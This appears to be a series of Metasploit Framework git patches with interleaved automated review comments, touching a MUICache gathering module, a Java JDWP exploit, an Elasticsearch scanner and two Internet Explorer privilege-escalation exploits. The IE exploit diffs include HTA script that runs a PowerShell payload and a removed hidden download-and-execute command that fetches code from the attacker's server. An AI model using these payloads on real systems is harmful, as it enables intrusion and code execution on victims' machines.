end @@ -188,7 +188,7 @@ class Metasploit3 < Msf::Post muicache_key_values.each do |value| key = value.name - if key[0] != "@" and key != "LangID" and not key.nil? + if key[0] != "@" && key != "LangID" && !key.nil? result = check_file_exists(key, user) results << result unless result.nil? end 
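Review bot: In process_hive the temporary copy of the hive is removed only on the success path: if `session.fs.file.download_file` or `hive_parser` raises, the downloaded NTUSER.DAT/USRCLASS.DAT copy stays on the local disk. Moving the download and the parse into a `begin … ensure` block keeps the cleanup in one place and still returns the parser's result. The `"jtrtmp"` prefix passed to `Rex::Quickfile.new` looks unrelated to this module (presumably carried over from elsewhere), so a stray file would be hard to attribute. The follow-up hunk `@@ -149,7 +149,13 @@` adds a rescue around the download but leaves `hive_parser` outside any cleanup. process_hive starts outside this hunk.

```ruby
local_hive_copy.close
begin
  session.fs.file.download_file(local_hive_copy.path, hive_path)
  hive_parser(local_hive_copy.path, muicache, user)
ensure
  # Runs on success and on any exception, so the hive copy never outlives the call.
  local_hive_copy.unlink rescue nil # Windows often complains about unlinking tempfiles
end
```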
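Review bot: The nil guard in `key[0] != "@" && key != "LangID" && !key.nil?` comes last, so a nil `key` raises NoMethodError at `key[0]` before `!key.nil?` is ever evaluated; the rewrite from `and`/`not` keeps that order. Put the check first, `if !key.nil? && key[0] != "@" && key != "LangID"`, or skip early with `next if key.nil?`. The same condition is repeated in the `@@ -188,7 +188,7 @@` hunk, in the loop over `muicache_key_values`. Both enclosing methods start outside their hunks.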
From a6229aedff2f8b9fb1a012dd6617e8099c7e98d4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 17:07:22 -0500 Subject: [PATCH 418/853] Rescue RequestError when downloading file --- modules/post/windows/gather/enum_muicache.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index 89fd17f3e6..dbf8824fd9 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -149,7 +149,13 @@ class Metasploit3 < Msf::Post print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") local_hive_copy = Rex::Quickfile.new("jtrtmp") local_hive_copy.close - session.fs.file.download_file(local_hive_copy.path, hive_path) + begin + session.fs.file.download_file(local_hive_copy.path, hive_path) + rescue ::Rex::Post::Meterpreter::RequestError + print_error("Unable to download NTUSER.DAT/USRCLASS.DAT file") + local_hive_copy.unlink rescue nil + return nil + end results = hive_parser(local_hive_copy.path, muicache, user) local_hive_copy.unlink rescue nil # Windows often complains about unlinking tempfiles From 60c530747581beb0528c8e6c23c5176543ba2978 Mon Sep 17 00:00:00 2001 From: Julian Vilas <julian.vilas@gmail.com> Date: Fri, 30 May 2014 00:14:59 +0200 Subject: [PATCH 419/853] Fix msftidy --- .../exploits/multi/misc/java_jdwp_debugger.rb | 101 +++++++++--------- 1 file changed, 50 insertions(+), 51 deletions(-) mode change 100755 => 100644 modules/exploits/multi/misc/java_jdwp_debugger.rb diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb old mode 100755 new mode 100644 index dd0be92a3b..c1cda6eded --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb 
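Review bot: The new `print_error("Unable to download NTUSER.DAT/USRCLASS.DAT file")` does not say whose hive failed, while the `print_status` two lines above it interpolates `#{user}`; when several profiles are processed in one run the failure cannot be tied back to an account. Suggest `print_error("Unable to download #{user}'s NTUSER.DAT/USRCLASS.DAT file")`. Only `::Rex::Post::Meterpreter::RequestError` is rescued, and whether `download_file` can raise anything else here is not visible from the hunk. process_hive starts outside the hunk.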
@@ -73,7 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote to execute code remotely. }, 'Author' => [ - 'Christophe Alladoum', # Exploit 'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module ], @@ -164,17 +163,17 @@ class Metasploit3 < Msf::Exploit::Remote flags = 0x00 cmdset, cmd = cmdsig - + pktlen = data.length + 11 - + buf = [pktlen, @myid, flags, cmdset, cmd] pkt = buf.pack("NNCCC") - + pkt << data - + @myid += 2 - + return pkt end @@ -230,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote end - # Packs normal string into string structure for target VM + # Packs normal string into string structure for target VM def build_string(data) ret = [data.length].pack('N') ret << data @@ -263,7 +262,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "Unknown format") end - # Parses given data according to a set of formats + # Parses given data according to a set of formats def parse_entries(buf, formats, explicit=true) entries = [] @@ -275,7 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote end nb_entries.times do |var| - + print_status("#{peer} - #{Time.now.getutc} - Parsed #{var} classes of #{nb_entries}") if var != 0 && var % datastore['STATUS_EVERY'] == 0 data = {} @@ -316,16 +315,16 @@ class Metasploit3 < Msf::Exploit::Remote # Gets the sizes of variably-sized data types in the target VM def idsizes - + sock.put(create_packet(IDSIZES_SIG)) response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - ["I", "fieldid_size"], - ["I", "methodid_size"], - ["I", "objectid_size"], - ["I", "referencetypeid_size"], - ["I", "frameid_size"] + formats = [ + ["I", "fieldid_size"], + ["I", "methodid_size"], + ["I", "objectid_size"], + ["I", "referencetypeid_size"], + ["I", "frameid_size"] ] entries = parse_entries(response, formats, false) 
@@ -346,12 +345,12 @@ class Metasploit3 < Msf::Exploit::Remote response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - ["S", "descr"], - ["I", "jdwp_major"], - ["I", "jdwp_minor"], - ["S", "vm_version"], - ["S", "vm_name"] + formats = [ + ["S", "descr"], + ["I", "jdwp_major"], + ["I", "jdwp_minor"], + ["S", "vm_version"], + ["S", "vm_name"] ] entries = parse_entries(response, formats, false) @@ -379,11 +378,11 @@ class Metasploit3 < Msf::Exploit::Remote response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - ["C", "reftype_tag"], + formats = [ + ["C", "reftype_tag"], [@vars["referencetypeid_size"], "reftype_id"], - ["S", "signature"], - ["I", "status"] + ["S", "signature"], + ["I", "status"] ] print_status("#{peer} - Parsing list of classes...") @@ -394,7 +393,7 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if specified class is currently loaded by the target VM and returns it def get_class_by_name(name) - + @classes.each { |entry_array| entry_array.each { |entry| @@ -406,7 +405,7 @@ class Metasploit3 < Msf::Exploit::Remote nil end - # Returns information for each method in a reference type (ie. object). Inherited methods are not included. + # Returns information for each method in a reference type (ie. object). Inherited methods are not included. # The list of methods will include constructors (identified with the name "<init>") def get_methods(reftype_id) @@ -418,11 +417,11 @@ class Metasploit3 < Msf::Exploit::Remote response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - [@vars["methodid_size"], "method_id"], - ["S", "name"], - ["S", "signature"], - ["I", "mod_bits"] + formats = [ + [@vars["methodid_size"], "method_id"], + ["S", "name"], + ["S", "signature"], + ["I", "mod_bits"] ] @methods[reftype_id] = parse_entries(response, formats) 
@@ -458,16 +457,16 @@ class Metasploit3 < Msf::Exploit::Remote target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature) - fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method + fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method return target_class, target_method end - # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") + # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") def str2fqclass(s) - + i = s.rindex(".") fail_with(Failure::BadConfig, 'Bad defined break class') unless i @@ -479,7 +478,7 @@ class Metasploit3 < Msf::Exploit::Remote classname << ';' return classname, method - + end @@ -494,7 +493,7 @@ class Metasploit3 < Msf::Exploit::Remote # Sets an event request. When the event described by this request occurs, an event is sent from the target VM def send_event(event_code, args) - + data = [event_code].pack('C') data << [SUSPEND_ALL].pack('C') data << [args.length].pack('N') @@ -517,7 +516,7 @@ class Metasploit3 < Msf::Exploit::Remote end - # Waits user defined time for an event sent from the target VM (or force event if possible) + # Waits user defined time for an event sent from the target VM (or force event if possible) def wait_for_event buf = read_reply(datastore['BREAK_TIMEOUT']) @@ -537,7 +536,7 @@ class Metasploit3 < Msf::Exploit::Remote len = @vars["objectid_size"] t_id = unformat(len,buf[10..10+len-1]) - + return r_id, t_id end 
@@ -554,7 +553,7 @@ class Metasploit3 < Msf::Exploit::Remote end - # Invokes a static method. The method must be member of the class type or one of its superclasses, + # Invokes a static method. The method must be member of the class type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke_static(class_id, thread_id, meth_id, args = []) @@ -579,7 +578,7 @@ class Metasploit3 < Msf::Exploit::Remote end - # Invokes a instance method. The method must be member of the object's type or one of its superclasses, + # Invokes a instance method. The method must be member of the object's type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke(obj_id, thread_id, class_id, meth_id, args = []) @@ -631,7 +630,7 @@ class Metasploit3 < Msf::Exploit::Remote end - + def temp_path return nil unless datastore['TMP_PATH'] unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') @@ -643,11 +642,11 @@ class Metasploit3 < Msf::Exploit::Remote # Configures payload according to targeted architecture def setup_payload - + # 1. Setting up generic values. payload_exe = rand_text_alphanumeric(4 + rand(4)) pl_exe = generate_payload_exe - + # 2. Setting up arch specific... case target['Platform'] when 'linux' @@ -881,7 +880,7 @@ class Metasploit3 < Msf::Exploit::Remote # 1. Prepares the payload payload_exe, pl_exe = setup_payload - + # 2. Creates file on server for dumping payload file = create_file(thread_id, payload_exe) 
@@ -906,20 +905,20 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - + @myid = 0x01 @vars = {} @classes = [] @methods = {} @os = nil - + check - + connect fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake - + # 1. Get the sizes of variably-sized data types in the target VM idsizes @@ -966,4 +965,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end \ No newline at end of file +end From 6f330ea19064c183c27d497f4dc9d0bc2287fdbc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 17:38:01 -0500 Subject: [PATCH 420/853] Add deprecation information --- .../scanner/elasticsearch/indeces_enum.rb | 6 ++ .../scanner/elasticsearch/indices_enum.rb | 89 +++++++++++++++++++ 2 files changed, 95 insertions(+) create mode 100644 modules/auxiliary/scanner/elasticsearch/indices_enum.rb diff --git a/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb index 196d77aec0..431593cf2c 100644 --- a/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb @@ -4,6 +4,7 @@ ## require 'msf/core' +require 'msf/core/module/deprecated' class Metasploit3 < Msf::Auxiliary @@ -11,6 +12,11 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report + include Msf::Module::Deprecated + + DEPRECATION_DATE = Date.new(2014, 07, 29) + DEPRECATION_REPLACEMENT = 'auxiliary/scanner/elasticsearch/indices_enum' + def initialize(info = {}) super(update_info(info, 'Name' => 'ElasticSearch Indices Enumeration Utility', diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb new file mode 100644 index 0000000000..196d77aec0 --- /dev/null +++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb 
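Review bot: `Date.new(2014, 07, 29)` in the `@@ -11,6 +12,11 @@` hunk writes the month with a leading zero, which Ruby parses as an octal literal; it gives the intended value for 07, but the same habit with 08 or 09 is a syntax error, so `Date.new(2014, 7, 29)` is the safer spelling. A one-line comment above `DEPRECATION_REPLACEMENT` saying why the module moved (presumably the misspelled file name) would explain to readers why two otherwise identical modules exist until the deprecation date.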
@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ElasticSearch Indices Enumeration Utility',
+ 'Description' => %q{
+ This module enumerates ElasticSearch Indices. It uses the REST API
+ in order to make it.
+ },
+ 'Author' =>
+ [
+ 'Silas Cutler <Silas.Cutler[at]BlackListThisDomain.com>'
+ ],
+ 'License' => MSF_LICENSE
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(9200)
+ ], self.class)
+ end
+
+ def peer
+ "#{rhost}:#{rport}"
+ end
+
+ def run_host(ip)
+ vprint_status("#{peer} - Querying indices...")
+ begin
+ res = send_request_raw({
+ 'uri' => '/_aliases',
+ 'method' => 'GET',
+ })
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable
+ vprint_error("#{peer} - Unable to establish connection")
+ return
+ end
+
+ if res && res.code == 200 && res.body.length > 0
+ begin
+ json_body = JSON.parse(res.body)
+ rescue JSON::ParserError
+ vprint_error("#{peer} - Unable to parse JSON")
+ return
+ end
+ else
+ vprint_error("#{peer} - Timeout or unexpected response...")
+ return
+ end
+
+ report_service(
+ :host => rhost,
+ :port => rport,
+ :proto => 'tcp',
+ :name => 'elasticsearch'
+ )
+
+ indices = []
+
+ json_body.each do |index|
+ indices.push(index[0])
+ report_note(
+ :host => rhost,
+ :port => rport,
+ :proto => 'tcp',
+ :type => "elasticsearch.index",
+ :data => index[0],
+ :update => :unique_data
+ )
+ end
+
+ if indices.length > 0
+ print_good("#{peer} - ElasticSearch Indices found: #{indices.join(", ")}")
+ end
+
+ end
+
+end
From 03889ed31f6e1f2e6d38353ffc3f4631ff7a64ea Mon Sep 17 00:00:00 2001 
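Review bot: run_host calls `report_service` with `:name => 'elasticsearch'` for any host that answers `/_aliases` with HTTP 200 and a body `JSON.parse` accepts, so an unrelated JSON service on that port is recorded as Elasticsearch, and a body that is not a Hash (an array, for instance) reaches `json_body.each` and `index[0]` with meaningless results. Check the shape before reporting, e.g. `return unless json_body.is_a?(Hash)` ahead of `report_service`, and iterate with `json_body.each_key` so the index name is taken directly. The header comment has `http//metasploit.com/download` without the colon after `http`.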
From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 18:11:22 -0500 Subject: [PATCH 421/853] Use cmd_psh_payload --- .../windows/local/ms13_097_ie_registry_symlink.rb | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index cb5334af06..c0e1c9d897 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -98,20 +98,14 @@ class Metasploit3 < Msf::Exploit::Local def on_request_uri(cli, request) if request.uri =~ /\.hta$/ print_status("Sending hta...") - download_and_run = "IEX ((new-object net.webclient).downloadstring('#{get_uri}/#{rand_text_alpha(4 + rand(4))}.psh'))" - command = "powershell.exe -w hidden -nop -c #{download_and_run}" hta = <<-eos <script> -var command = "cmd.exe /c #{command}"; +var command = "#{cmd_psh_payload(payload.encoded).strip}"; var shell = new ActiveXObject("WScript.Shell"); shell.Run(command); </script> eos send_response(cli, hta, {'Content-Type'=>'application/hta'}) - elsif request.uri =~ /\.psh$/ - print_status("Sending psh payload...") - data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) - send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) elsif request.uri =~ /\.html$/ print_status("Sending window close html...") close_html = <<-eos From ffbcbe8cc1df1fb7d1a64de06c656b9e557327d0 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 18:12:18 -0500 Subject: [PATCH 422/853] Use cmd_psh_payload --- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index fd39ad0a0f..6b1193acfe 100644 
--- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -94,20 +94,15 @@ class Metasploit3 < Msf::Exploit::Local def on_request_uri(cli, request) if request.uri =~ /\.hta$/ print_status("Sending hta...") - download_and_run = "IEX ((new-object net.webclient).downloadstring('#{get_uri}/#{rand_text_alpha(4 + rand(4))}.psh'))" - command = "powershell.exe -w hidden -nop -c #{download_and_run}" hta = <<-eos <script> -var command = "cmd.exe /c #{command}"; +var command = "#{cmd_psh_payload(payload.encoded).strip}"; var shell = new ActiveXObject("WScript.Shell"); shell.Run(command); </script> eos + print_status(hta) send_response(cli, hta, {'Content-Type'=>'application/hta'}) - elsif request.uri =~ /\.psh$/ - print_status("Sending psh payload...") - data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) - send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) else send_not_found(cli) end From 1dbd36a3dd424c67db01cda695fa74cf6270b671 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 09:02:43 -0500 Subject: [PATCH 423/853] Check for the .NET dfsvc and use %windir% --- data/exploits/CVE-2014-0257/CVE-2014-0257.dll | Bin 107520 -> 108544 bytes .../windows/local/ms14_009_ie_dfsvc.rb | 8 ++++++-- 2 files changed, 6 insertions(+), 2 deletions(-) 
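Review bot: The added `print_status(hta)` in on_request_uri prints the whole generated HTA, including the encoded payload command, to the console on every `.hta` request; it reads like leftover debugging and is not mentioned in the commit subject. Drop the line, or demote it to `vprint_status(hta)` so it only appears when verbose output is requested. The method's closing `end` is not part of the hunk.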
diff --git a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll index ef0eeb3a3c9cbd1739b993a8dc9bdad0a4fa6d05..cdfd0626b75c0d6fff30a5b9625536d432cbf51a 100755 GIT binary patch delta 20524 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 
